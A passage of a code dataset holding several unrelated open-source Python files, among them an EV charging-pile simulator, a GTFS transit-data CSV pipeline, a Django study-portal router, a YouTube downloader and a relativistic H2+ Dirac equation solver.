times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.01,\n stroke = domainsetcolors[domain],\n fill = domainsetcolors[domain]))\n if domain not in domainsave:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = domainsetcolors[domain],\n fill = domainsetcolors[domain]))\n gspaint.add(gspaint.text(\n domain,\n insert = (legendx0 + 50, legendy0+16.5),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n domainsave.append(domain)\n legendy0 -= 5\n lines = gspaint.add(gspaint.g(stroke_width=2, stroke='gray', fill='none'))\n lines.add(gspaint.polyline(\n [(legendboxx0, legendboxy0), (1010, legendboxy0), (1010, legendy0), (legendboxx0, legendy0), (legendboxx0, legendboxy0)]))\n\n\n #paint start codon\n stcodoninfo = GetTagInfo(locus, 'start_codon', data)\n for info in stcodoninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n if length < 2:\n length = 2\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 12.5),\n size = (str(length) + \"px\", \"40px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"start_codon\"],\n fill = tagcolors[\"start_codon\"]))\n gspaint.add(gspaint.text(\n \"ATG\",\n insert = ((begin - MinPos + paintx0) / times - 10, y0 + 42),\n font_size = 10,\n fill = 'black'))\n\n #paint end codon\n endcodoninfo = GetTagInfo(locus, 'stop_codon', data)\n for info in endcodoninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n if length < 2:\n length = 2\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0)/times-2, y0 - 12.5),\n size = (str(length) + \"px\", \"40px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"stop_codon\"],\n fill = tagcolors[\"stop_codon\"]))\n gspaint.add(gspaint.text(\n \"TAG\",\n insert = ((begin - MinPos + paintx0) / times - 10, y0 + 42),\n font_size = 10,\n fill = 'black'))\n\n #paint marker\n markerinfo = GetDomainInfo(locus, 'marker', data)\n for info in markerinfo:\n (marker, start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n if length < 2:\n length = 2\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0)/times-2, y0 - 12.5),\n size = (str(length) + \"px\", \"40px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"marker\"],\n fill = tagcolors[\"marker\"]))\n gspaint.add(gspaint.text(\n marker,\n insert = ((begin - MinPos + paintx0) / times - 10, y0 -20),\n font_size = 10,\n fill = 'red'))\n\n y0 = legendy0 + 50\n\ngspaint.save()\nprint(\"\"\"\n\\n\\n-------------------------\nSuccess!!!\nCongratulations to you!!!\"\"\"\n)\n\n\n","repo_name":"guochangjiang/Python.learn","sub_path":"Biopython/my.biopython/gene.structure.paint/PaintGeneStructure.py","file_name":"PaintGeneStructure.py","file_ext":"py","file_size_in_byte":18333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"17187543289","text":"from enum import Enum\nfrom typing import Optional\nfrom classes.Timer import timer, Time\nfrom classes.ChargingRequest import del_charging_request\nfrom classes.ChargingRequest import get_charging_queue_num, ChargingMode, get_charging_mode,get_charging_request,get_charging_request_user\nfrom classes.Bill import compute_price,Bill,Bill_status\nfrom classes.Bill import bill_manager\nfrom config.sys import PILE_FAST_SPEED, PILE_NORMAL_SPEED\n\nimport threading\n\nclass PileState(Enum):\n Idle = 0\n Working = 1\n Error = 2\n\nclass PileType(Enum):\n Normal = 0\n Fast = 1\n\n# unit: 1 capacity per second\nPILE_CHARGE_SPEED = {\n PileType.Fast: PILE_FAST_SPEED / 3600,\n PileType.Normal: PILE_NORMAL_SPEED / 3600\n}\n\n\nclass ChargingInfo:\n car_id: str\n bill_id: str\n queue_num: str\n charged_amount: float\n all_amount: float\n charged_seconds: float\n waited_seconds: float\n start_time: Time\n status: int\n charge_speed: float\n fee: float\n\n base_amount: float\n base_seconds: float\n base_fee: float\n base_start_time: Time\n\n def __init__(self, bill_id: str, car_id: str, all_amount: float):\n self.car_id = car_id\n self.all_amount = all_amount\n self.bill_id = bill_id\n self.charged_amount = 0\n self.queue_num = get_charging_queue_num(car_id)\n self.charged_seconds = 0.0\n self.waited_seconds = 0.0\n #\n self.start_time = None\n self.status = 0\n self.charge_speed = 0.0\n self.fee = 0.0\n \n def __lt__(self, other):\n return self.queue_num < other.queue_num\n\n def start(self,pile_id:str, type:PileType):\n self.start_time = timer.time()\n self.charge_speed = PILE_CHARGE_SPEED[type]\n self.status = 1\n bill = bill_manager.find(self.bill_id)\n bill.start(pile_id,type.value)\n\n def end(self):\n self.update()\n bill_manager.find(self.bill_id).end()\n if self.all_amount <= self.charged_amount:\n self.status = 2\n else:\n self.status = 0\n\n def update(self):\n if self.status == 1:\n cur = timer.time()\n max_duration = cur - self.start_time\n max_amount = max_duration * self.charge_speed\n if max_amount > self.all_amount:\n self.status = 2\n self.charged_amount = self.all_amount\n self.charged_seconds = self.all_amount / self.charge_speed\n else:\n self.charged_seconds = max_duration\n self.charged_amount = max_amount\n _, _, service_fee, charge_fee = compute_price(self.start_time, cur, get_charging_mode(self.car_id))\n self.fee = service_fee + charge_fee\n\n\n def time_remain(self) -> float:\n if self.status == 0:\n return -1\n elif self.status == 2:\n return 0.0\n cur = timer.time()\n return self.all_amount / self.charge_speed - (cur - self.start_time)\n \n def current(self):\n self.update()\n return self.to_dict()\n \n def current_result(self):\n self.update()\n return self.to_tuple_str()\n\n # to dict\n def to_dict(self) -> dict:\n return {\n \"car_id\": self.car_id,\n \"user_id\": get_charging_request_user(self.car_id),\n \"status\": self.status,\n \"all_amount\": self.all_amount,\n \"queue_num\": self.queue_num,\n \"start_time\": self.start_time.to_string() if self.start_time is not None else \"\",\n \"time_remain\": self.time_remain(),\n \"charged_amount\": self.charged_amount,\n \"charged_seconds\": self.charged_seconds,\n \"fee\": self.fee,\n }\n \n def to_tuple_str(self) -> str: \n my_tuple = (self.car_id, \"{:.2f}\".format(self.charged_amount), \"{:.2f}\".format(self.fee))\n return '(' + ', '.join(map(str, my_tuple)) + ')'\n\npile_callbacks = []\n\nclass ChargingPile:\n pile_id: str\n pile_type: PileType\n charge_speed: float\n status: PileState\n cars_queue: list\n total_amount: float\n task_info: ChargingInfo\n task_id: int\n start_time: Time\n lock: threading.Lock\n run_time: float\n\n def __init__(self, pile_id: str, pile_type: PileType):\n # metadata\n self.pile_id = pile_id\n self.pile_type = pile_type\n self.charge_speed = PILE_CHARGE_SPEED[pile_type]\n\n # runtime data\n self.status = PileState.Idle\n self.task_info = None\n self.total_amount = 0.0\n self.start_time = timer.time()\n self.run_time = 0.0\n self.cars_queue = list()\n self.task_id = -1\n self.lock = threading.Lock()\n \n def end_charging(self):\n end_time = timer.time()\n print(f'{end_time.to_string()} end charging: {self.task_info.car_id}')\n self.lock.acquire()\n if self.task_info is not None:\n self.task_info.end()\n self.total_amount += self.task_info.charged_amount\n # request = get_charging_request(self.task_info.car_id)\n # bill=Bill()\n # bill.generate_request(request.user_id,self.pile_id,self.task_info.car_id,request.mode.value,self.task_info.charged_amount,self.task_info.start_time)\n # bill.persist(end_time,Bill_status.Submitted,container)\n if self.task_info.status == 2:\n del_charging_request(self.task_info.car_id)\n self.task_info = None\n self.task_id = -1\n \n if self.status != PileState.Error:\n if len(self.cars_queue) == 0:\n self.status = PileState.Idle\n self.lock.release()\n else:\n self.lock.release()\n self.start_charging()\n\n for func in pile_callbacks:\n func(ChargingMode(self.pile_type.value))\n else:\n self.lock.release()\n \n def start_charging(self):\n with self.lock:\n if self.status == PileState.Error:\n return \n if len(self.cars_queue) > 0 and self.task_info is None:\n self.task_info = self.cars_queue.pop(0)\n if self.task_info is None:\n return\n \n print(f'start charging: {self.task_info.car_id} {self.task_info.all_amount}')\n self.status = PileState.Working\n interval = self.task_info.all_amount / self.charge_speed\n print(f'charge_speed: {self.charge_speed} interval:{interval}')\n self.task_info.start(self.pile_id,self.pile_type)\n self.task_id = timer.create_task(interval, self.end_charging, args=None)\n\n def cancel_charging(self, car_id: str):\n self.lock.acquire()\n if self.task_info is not None and self.task_info.car_id == car_id:\n self.lock.release()\n timer.cancel_task(self.task_id, run = True)\n del_charging_request(car_id)\n else:\n for item in self.cars_queue:\n if item.car_id == car_id:\n self.cars_queue.remove(item)\n item.end()\n del_charging_request(car_id)\n self.lock.release()\n \n\n def queue_car(self, info:ChargingInfo, forced: bool = False):\n if not forced and len(self.cars_queue) >= 1:\n return False\n with self.lock:\n self.cars_queue.append(info)\n\n if self.status == PileState.Idle:\n self.start_charging()\n return True\n \n\n def expected_finish_time(self) -> float:\n times = 0.0\n if self.task_info is not None:\n times += self.task_info.time_remain()\n\n for info in self.cars_queue:\n times += info.time_remain()\n\n return times\n \n def get_position(self, car_id: str) -> int:\n with self.lock:\n if self.task_info is not None and self.task_info.car_id == car_id:\n return 0\n for i in range(len(self.cars_queue)):\n if self.cars_queue[i].car_id == car_id:\n return i + 1\n return -1\n\n\n def shutdown(self):\n with self.lock:\n self.status = PileState.Error\n self.run_time = timer.time() - self.start_time\n self.start_time = None\n\n l = list(self.cars_queue)\n for item in l:\n item.end()\n self.cars_queue = list()\n\n if self.task_info is not None:\n l.append(self.task_info)\n timer.cancel_task(self.task_id, run=True)\n return l\n \n\n def get_charging_info(self, car_id: str) -> Optional[ChargingInfo]:\n with self.lock:\n if self.task_info is not None and self.task_info.car_id == car_id:\n return self.task_info.current()\n for item in self.cars_queue:\n if item.car_id == car_id:\n return item.current()\n return None\n \n def get_waiting_list(self) -> list:\n with self.lock:\n l = list(self.cars_queue)\n return [item.current() for item in l]\n \n def get_run_time(self) -> float:\n if self.status == PileState.Error:\n return self.run_time\n else:\n return self.run_time + ((timer.time() - self.start_time) if self.start_time is not None else 0)\n \n def detail(self):\n res = {}\n with self.lock:\n if self.task_info is not None:\n res['charging'] = self.task_info.current()\n else:\n res['charging'] = None\n l = list(self.cars_queue)\n res['waiting'] = [item.current() for item in l]\n\n res['status'] = self.status.value\n res['amount'] = self.total_amount + (self.task_info.charged_amount if self.task_info is not None else 0) + sum([item.charged_amount for item in l])\n res['time'] = self.get_run_time()\n return res\n \n def result(self):\n res = {}\n with self.lock:\n if self.task_info is not None:\n res['charging_area'] = self.task_info.current_result()\n else:\n res['charging_area'] = None\n l = list(self.cars_queue)\n for item in l:\n res['queuing_area'] = item.current_result()\n return res\n\n def clear_queue(self):\n with self.lock:\n l = list(self.cars_queue)\n for item in l:\n item.end()\n self.cars_queue = list()\n return l\n\n def restart(self):\n if self.status != PileState.Error:\n return\n self.start_time = timer.time()\n self.cars_queue = list()\n self.task_id = -1\n self.status = PileState.Idle\n for func in pile_callbacks:\n func(ChargingMode(self.pile_type.value))\n\n def is_vacant(self) -> bool:\n with self.lock:\n return self.status != PileState.Error and len(self.cars_queue) == 0\n \n def numbers(self) -> int:\n num = 0\n with self.lock:\n if self.status == PileState.Error:\n return 0\n if self.task_info is not None:\n num += 1\n num += len(self.cars_queue)\n return num\n \n def get_maximum_available(self) -> int:\n with self.lock:\n result = 0\n if self.task_info is None:\n result += 1\n result += 1 - len(self.cars_queue)\n \n t = timer.time() \n print(f'{t.hour}:{t.minute} vacant: {self.pile_id} - {result}')\n return result if result > 0 else 0\n\ncharging_piles = {\n \"F1\": ChargingPile(\"F1\", PileType.Fast),\n \"F2\": ChargingPile(\"F2\", PileType.Fast),\n \"T1\": ChargingPile(\"T1\", PileType.Normal),\n \"T2\": ChargingPile(\"T2\", PileType.Normal),\n \"T3\": ChargingPile(\"T3\", PileType.Normal),\n}\n\n\ndef get_pile(pile_id: str) -> Optional[ChargingPile]:\n if pile_id in charging_piles:\n return charging_piles[pile_id]\n else:\n return None\n \n# 判断一辆车是否正在充电,若正在充电,则终止\ndef is_charging(car_id: str) -> bool:\n for _, pile in charging_piles.items():\n if pile.get_charging_info(car_id) is not None:\n return True \n return False \n\n\n\n \n\n","repo_name":"ghostfly23333/ACSSBackend","sub_path":"src/classes/ChargingPile.py","file_name":"ChargingPile.py","file_ext":"py","file_size_in_byte":12382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24053127952","text":"import time\nimport board\nimport adafruit_dht\nimport subprocess\n\n\ndef get_temperature():\n\n dhtDevice = adafruit_dht.DHT22(board.D4)\n\n try:\n # Print the values to the serial port\n temperature_c = dhtDevice.temperature\n temperature_f = temperature_c * (9 / 5) + 32\n humidity = dhtDevice.humidity\n\n tempval = {\"temp\": temperature_c, \"humidity\": humidity}\n\n return tempval\n\n except RuntimeError as error:\n # Errors happen fairly often, DHT's are hard to read, just keep going\n print(error.args[0])\n except Exception as error:\n dhtDevice.exit()\n raise error\n\n","repo_name":"tak-st/oheya_checkn","sub_path":"device/temperature/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"19815189088","text":"'''\nThis function converts a folder of protobuf files into fully cleaned csv files.\nEach folder suggest to contain one day GTFS data.\nThis code use the multiprocessing function for a faster processing.\n\nTotally 2 required:\n\n1. The input path to the protobuf folder.\n The input path should be inputed after calling the file name 'tu_transform_csv_folder.py',\n as the second System Specific Parameter (sys.argv[1])\n\n2. The output path.\n The output path should be inputed after the first input,\n as the third System Specific Parameter (sys.argv[2])\n'''\n\n# import packages\nimport tu_all_steps\nimport sys\nimport multiprocessing\nfrom datetime import datetime\nimport glob\nimport os\nimport time\nimport pandas as pd\n\n# Get csv folder directory\ndir_ori = str(sys.argv[1])\n\n# Check whether a file is imported instead of a folder.\n# Make sure the input dir_ori is only for a csv folder.\nif dir_ori[-6:] == '.pb.gz' or dir_ori[-3:] == '.pb':\n print('A folder path is required as the first input, not a file path')\n sys.exit()\n\n# Add '/' to the folder of the path has no '/' at the end\nif dir_ori[-1:] != '/':\n dir_ori += '/'\n\n# Generate file name\nfull_file_name = dir_ori.split('/')[-2]+'_all.csv.gz'\n\n# Get destination folder\nclass_layer = dir_ori.split('/')[-4]\ndate_layer = dir_ori.split('/')[-2] +'/'\ndir_dest_folder = dir_ori.replace(class_layer,'daily_tu').replace(dir_ori.split('/')[-1],'').replace(date_layer,'')\n\n# if destination path inputted, get output path.\nif len(sys.argv) >2:\n dir_dest = str(sys.argv[2])\n# if no destination path inputted, generated the best estimate of output path.\nelse:\n dir_dest = dir_dest_folder + full_file_name\n\n# Check if destination folder exists. Create if not.\nif not os.path.exists(dir_dest_folder):\n os.makedirs(dir_dest_folder, exist_ok=True)\n print('Destination Folder Created: ',dir_dest_folder)\n\n# Get csv output Folder\ndir_csv_folder = dir_ori.replace(class_layer,'12_csv_transformed_tu')\n\n\n# Define the function for multiprocessing\ndef pd_to_csv(src):\n tu_all_steps.tu_pd_to_clean_csv(src,'')\n\n# Start the parallel processing\nif __name__ == '__main__':\n\n # Get start time for generating csv\n tStart = datetime.now()\n # Check number of CPUs\n np = multiprocessing.cpu_count()\n # Generate process list\n processes = []\n # Set up pool by the number of CPUs\n pool = multiprocessing.Pool(processes = np)\n # Get file paths within the csv folder\n ls_dir = glob.glob(os.path.join(dir_ori + '*.pb.gz'))\n\n # Raise an error if no file found\n if len(ls_dir) == 0:\n print('No File Found')\n sys.exit()\n\n # Run the funtion using multiprocessing\n result = pool.map(pd_to_csv, ls_dir)\n\n # Include time gap\n time.sleep(10)\n\n # Shut down multiprocessing\n try:\n pool.close()\n pool.join()\n except:\n print('Unable to shut doen multiprocessing')\n\n # Print process time\n print('Generating csv files took {} minutes'.format((datetime.now() - tStart)/60))\n\n # Get start time for merge csv\n tStart = datetime.now()\n\n # Get file paths within the csv folder\n ls_dir = glob.glob(os.path.join(dir_csv_folder + '*.csv.gz'))\n\n # Raise an error if no file found\n if len(ls_dir) == 0:\n print('No File Found')\n sys.exit()\n\n # Sort ls_dir\n ls_dir.sort()\n\n # print(ls_dir)\n\n # Read the first csv file\n df = pd.read_csv(ls_dir[0],compression='gzip',dtype={'id':'str',\n 'trip_id':'str',\n 'trip_schedule_relationship':'str',\n 'route_id':'str',\n 'vehicle_id':'str',\n 'stop_sequence':'Int64',\n 'stop_arrival_delay':'Int64',\n 'stop_departure_delay':'Int64',\n 'stop_id':'str',\n 'stop_schedule_relationship':'str',\n 'request_time_dt':'str',\n 'timestamp_dt':'str',\n 'stop_arrival_time_dt':'str',\n 'stop_departure_time_dt':'str',\n 'trip_start_time_dt':'str'})\n # df['trip_id'] = df['trip_id'].astype(str)\n # df['stop_sequence'] = df['stop_sequence'].astype(int)\n # Sort the dataframe\n df = df.sort_values(by=['id','stop_sequence'])\n\n # Loop from the second csv file within the folder\n for i in range(1,len(ls_dir)):\n # Read the csv file\n this_df = pd.read_csv(ls_dir[i],compression='gzip',dtype={'id':'str',\n 'trip_id':'str',\n 'trip_schedule_relationship':'str',\n 'route_id':'str',\n 'vehicle_id':'str',\n 'stop_sequence':'Int64',\n 'stop_arrival_delay':'Int64',\n 'stop_departure_delay':'Int64',\n 'stop_id':'str',\n 'stop_schedule_relationship':'str',\n 'request_time_dt':'str',\n 'timestamp_dt':'str',\n 'stop_arrival_time_dt':'str',\n 'stop_departure_time_dt':'str',\n 'trip_start_time_dt':'str'})\n # this_df['trip_id'] = this_df['trip_id'].astype(str)\n # this_df['stop_sequence'] = this_df['stop_sequence'].astype(int)\n this_df = this_df.sort_values(by=['id','stop_sequence'])\n # Concat with existing data\n # Only keep the latest trip update.\n df = pd.concat([df,this_df],ignore_index=True).drop_duplicates(['trip_id', 'stop_sequence'],keep='last')\n\n # Print progress\n if i % int(len(ls_dir)/10) == 0:\n print((i // int(len(ls_dir)/10))*10,'% Complete!')\n\n df = df.sort_values(by=['id','stop_sequence'])\n # Save csv file\n df.to_csv(dir_dest,index=False,compression='gzip')\n\n # Get current time\n tEnd = datetime.now()\n\n # Print information\n print(full_file_name, 'is completed at:', tEnd.isoformat(' ', 'seconds') + '; Run Time:', tEnd-tStart)\n\n # Exit\n sys.exit()\n","repo_name":"teckkean/GTFS-Data-Pipeline-TfNSW-Bus","sub_path":"GTFS_DPL_v2/tu_all_steps_folder.py","file_name":"tu_all_steps_folder.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"4736090002","text":"from vampyr import vampyr3d as vp\nfrom orbital4c import orbital as orb\nfrom orbital4c import nuclear_potential as nucpot\nfrom orbital4c import complex_fcn as cf\nimport numpy as np\nfrom scipy.special import legendre, laguerre, erf, gamma\nfrom scipy.special import gamma\nfrom scipy.constants import hbar\n\nimport argparse\nimport numpy as np\nimport numpy.linalg as LA\nimport sys, getopt\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Collecting all data tostart the program.')\n parser.add_argument('-d', '--dtype', dest='dtype', type=str, default='dirac',\n help='Dirac or Dirac-square operators')\n parser.add_argument('-v', '--potential', dest='potential', type=str, default='point_charge',\n help='tell me wich model for V you want to use point_charge, coulomb_HFYGB, homogeneus_charge_sphere, gaussian')\n args = parser.parse_args()\n\n assert args.potential in ['point_charge', 'coulomb_HFYGB', 'homogeneus_charge_sphere', 'gaussian'], 'Please, specify V'\n assert args.dtype in ['dirac', 'dirac2'], 'Please, specify Dirac-type operator'\n\ndef analytic_1s(light_speed, n, k, Z):\n alpha = 1/light_speed\n gamma = orb.compute_gamma(k,Z,alpha)\n tmp1 = n - np.abs(k) + gamma\n tmp2 = Z * alpha / tmp1\n tmp3 = 1 + tmp2**2\n return light_speed**2 / np.sqrt(tmp3)\n\n\nlight_speed = 137.03599913900001\nalpha = 1/light_speed\nk = -1\nl = 0\nn = 1\nm = 0.5\nZ = 1\natom = 'H'\n\nenergy_1s = analytic_1s(light_speed, n, k, Z)\nprint('Exact Energy',energy_1s - light_speed**2)\n\nmra = vp.MultiResolutionAnalysis(box=[-60,60], order=6)\nprec = 1.0e-4\norigin1 = [0.1, 0.2, -0.7] # origin moved to avoid placing the nuclar charge on a node\norigin2 = [0.1, 0.2, 1.3] # origin moved to avoid placing the nuclar charge on a node\n\n################### Define V potential ######################\nif args.potential == 'point_charge':\n def VH2(x, origin1, origin2, Z1, Z2):\n V1 = nucpot.point_charge(x, origin1, Z1)\n V2 = nucpot.point_charge(x, origin2, Z2)\n return V1 + V2\n f = lambda x: VH2(x, origin1, origin2, Z, Z)\nelif args.potential == 'coulomb_HFYGB':\n def VH2(x, origin1, origin2, Z1, Z2, prec):\n V1 = nucpot.coulomb_HFYGB(x, origin1, Z1, prec)\n V2 = nucpot.coulomb_HFYGB(x, origin2, Z2, prec)\n return V1 + V2\n f = lambda x: VH2(x, origin1, origin2, Z, Z, prec)\nelif args.potential == 'homogeneus_charge_sphere':\n def VH2(x, origin1, origin2, Z1, Z2, atom):\n V1 = nucpot.homogeneus_charge_sphere(x, origin1, Z1, atom)\n V2 = nucpot.homogeneus_charge_sphere(x, origin2, Z2, atom)\n return V1 + V2\n f = lambda x: VH2(x, origin1, origin2, Z, Z, atom)\nelif args.potential == 'gaussian':\n def VH2(x, origin1, origin2, Z1, Z2):\n V1 = nucpot.gaussian(x, origin1, Z1, atom)\n V2 = nucpot.gaussian(x, origin2, Z2, atom)\n return V1 + V2\n f = lambda x: VH2(x, origin1, origin2, Z, Z, atom)\n\nPeps = vp.ScalingProjector(mra,prec/10)\nV_tree = Peps(f)\nprint('V_tree', V_tree)\nprint('Define V Potential', args.potential, 'DONE')\n\norb.orbital4c.light_speed = light_speed\norb.orbital4c.mra = mra\ncf.complex_fcn.mra = mra\n\na_coeff = 3.0\nb_coeff = np.sqrt(a_coeff/np.pi)**3\ngauss1 = vp.GaussFunc(b_coeff, a_coeff, origin1)\ngauss2 = vp.GaussFunc(b_coeff, a_coeff, origin2)\ngauss1_tree = vp.FunctionTree(mra)\ngauss2_tree = vp.FunctionTree(mra)\nvp.advanced.build_grid(out=gauss1_tree, inp=gauss1)\nvp.advanced.project(prec=prec, out=gauss1_tree, inp=gauss1)\nvp.advanced.build_grid(out=gauss2_tree, inp=gauss2)\nvp.advanced.project(prec=prec, out=gauss2_tree, inp=gauss2)\n\nh2p_orb = gauss1_tree + gauss2_tree\nh2p_orb.normalize()\n\nspinor_H = orb.orbital4c()\nLa_comp = cf.complex_fcn()\nLa_comp.copy_fcns(real = h2p_orb)\nspinor_H.copy_components(La = La_comp)\nspinor_H.init_small_components(prec/10)\nspinor_H.normalize()\n\nprint(\"spinor_H\")\nprint(spinor_H)\n\nderivative = 'BS'\n\nerror_norm = 1\nc2 = light_speed * light_speed\n\nif args.dtype == 'dirac':\n while error_norm > prec:\n hd_psi = orb.apply_dirac_hamiltonian(spinor_H, prec, der = derivative)\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec)\n add_psi = hd_psi + v_psi\n energy = spinor_H.dot(add_psi).real\n print('Energy =',energy - light_speed**2)\n mu = orb.calc_dirac_mu(energy, light_speed)\n tmp = orb.apply_helmholtz(v_psi, mu, prec)\n tmp.crop(prec/10)\n new_orbital = orb.apply_dirac_hamiltonian(tmp, prec, energy, der = derivative)\n new_orbital.crop(prec/10)\n new_orbital.normalize()\n delta_psi = new_orbital - spinor_H\n deltasq = delta_psi.squaredNorm()\n error_norm = np.sqrt(deltasq)\n print('Error =', error_norm)\n spinor_H = new_orbital\n \n hd_psi = orb.apply_dirac_hamiltonian(spinor_H, prec, der = derivative)\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec)\n add_psi = hd_psi + v_psi\n energy = spinor_H.dot(add_psi).real\n print('Final Energy =',energy - light_speed**2)\n\nelif args.dtype == 'dirac2':\n while error_norm > prec:\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec) \n vv_psi = orb.apply_potential(-0.5/c2, V_tree, v_psi, prec)\n beta_v_psi = v_psi.beta2()\n apV_psi = v_psi.alpha_p(prec, derivative)\n ap_psi = spinor_H.alpha_p(prec, derivative)\n Vap_psi = orb.apply_potential(-1.0, V_tree, ap_psi, prec)\n anticom = apV_psi + Vap_psi\n RHS = beta_v_psi + vv_psi + anticom * (0.5/light_speed)\n cke = spinor_H.classicT()\n cpe = (spinor_H.dot(RHS)).real\n print(\"Classic-like energies:\", \"cke =\", cke,\"cpe =\", cpe,\"cke + cpe =\", cke + cpe)\n mu = orb.calc_non_rel_mu(cke+cpe)\n print(\"mu =\", mu)\n new_orbital = orb.apply_helmholtz(RHS, mu, prec)\n new_orbital.normalize()\n delta_psi = new_orbital - spinor_H\n deltasq = delta_psi.squaredNorm()\n error_norm = np.sqrt(deltasq)\n print(\"Error =\", error_norm)\n spinor_H = new_orbital\n \n hd_psi = orb.apply_dirac_hamiltonian(spinor_H, prec, der = derivative)\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec)\n add_psi = hd_psi + v_psi\n energy = spinor_H.dot(add_psi).real\n \n cke = spinor_H.classicT()\n beta_v_psi = v_psi.beta2()\n beta_pot = (beta_v_psi.dot(spinor_H)).real\n pot_sq = (v_psi.dot(v_psi)).real\n ap_psi = spinor_H.alpha_p(prec, derivative)\n anticom = (ap_psi.dot(v_psi)).real\n energy_kutzelnigg = cke + beta_pot + pot_sq/(2*c2) + anticom/light_speed\n \n print('Kutzelnigg =',cke, beta_pot, pot_sq/(2*c2), anticom/light_speed, energy_kutzelnigg)\n print('Quadratic approx =',energy_kutzelnigg - energy_kutzelnigg**2/(2*c2))\n print('Correct from Kutzelnigg =', c2*(np.sqrt(1+2*energy_kutzelnigg/c2)-1))\n print('Final Energy =',energy - light_speed**2)\n \n energy_1s = analytic_1s(light_speed, n, k, Z)\n \n print('Exact Energy =',energy_1s - light_speed**2)\n print('Difference 1 =',energy_1s - energy)\n print('Difference 2 =',energy_1s - energy_kutzelnigg - light_speed**2)\n","repo_name":"MRChemSoft/ReMRChem","sub_path":"H2+.py","file_name":"H2+.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"6941298198","text":"from django.urls import path\nfrom .views import *\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns=[\n path('', home, name='home'),\n path('notes/', notes, name=\"notes\"),\n # this path takes one to a specific note and delete's it\n path('delete_note//', delete_note, name=\"delete_note\"),\n # this path references a generic view hence '.as_view'\n path('notes_view//', NotesDetailView.as_view(), name=\"notes_detail\"),\n \n path('homework/', homework, name=\"homework\"),\n path('update_homework/', update_homework, name=\"update_homework\"),\n path('delete_homework//', delete_homework, name=\"delete_homework\"),\n\n path('youtube/', youtube, name=\"youtube\"),\n\n path('todo/', todo, name=\"todo\"),\n path('update_todo/', update_todo, name=\"update_todo\"),\n path('delete_todo//', delete_todo, name=\"delete_todo\"),\n\n path('books/', books, name=\"books\"),\n\n path('dictionary/', dictionary, name='dictionary'),\n\n path('wiki/', wiki, name='wiki'),\n\n path('conversion/', conversion, name=\"conversion\"),\n] \n","repo_name":"Eugene-Kwaka/MasomoYanguPortal","sub_path":"masomoyangu/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6180940234","text":"from pytube import YouTube\nfrom os import rename\n\nytInput = input('Enter a YouTube link: ')\nyt = YouTube(ytInput)\n\n# Provide info about the video.\nprint(f'''\nTitle: {yt.title}\nViews: {yt.views}\nRating: {yt.rating}\n''')\n\nformatInput = input('Get the video or the audio: ')\nif formatInput.lower() == 'video':\n stream = yt.streams.filter(progressive=True).get_highest_resolution()\nelif formatInput.lower() == 'audio':\n stream = yt.streams.filter(only_audio=True)[0]\nelse:\n print('Invalid type. Please, start over.')\n exit()\n\nprint('Downloading...')\nstream.download()\nif formatInput.lower() == 'audio':\n rename(f'{(yt.title.replace(\"/\", \"\"))}.mp4', f'{(yt.title.replace(\"/\", \"\"))}.mp3')\n\nprint('Downloaded!')\n","repo_name":"ThePhoDit/YTDownloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12134068819","text":"import os\nimport warnings\nfrom pyvirtualdisplay import Display\n\ntry:\n ORIGIN_DISP = os.environ['DISPLAY']\nexcept KeyError:\n warnings.warn('''You may be run the process in docker which has no X server.\n We may set the DISPLAY env to an empty str for avoiding exception''')\n ORIGIN_DISP = '' # Docker in case\nDISP = Display(visible=False, size=(1400, 900))\nDISP.start()\nVIRTUAL_DISP = os.environ['DISPLAY']\nos.environ['DISPLAY'] = ORIGIN_DISP\n\n\ndef virtual_display(func):\n def wrapper(*args, **kwargs):\n os.environ['DISPLAY'] = VIRTUAL_DISP\n func(*args, **kwargs)\n os.environ['DISPLAY'] = ORIGIN_DISP\n return wrapper\n","repo_name":"tphanson/gym-agent","sub_path":"env/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73758289702","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\nfrom collections import OrderedDict as odict\n\nfrom util.mnkhelpers import bits2boards as b2b\n\nimport clean as cl\n\nclass HVHData():\n def __init__(self, folder):\n self.original_columns 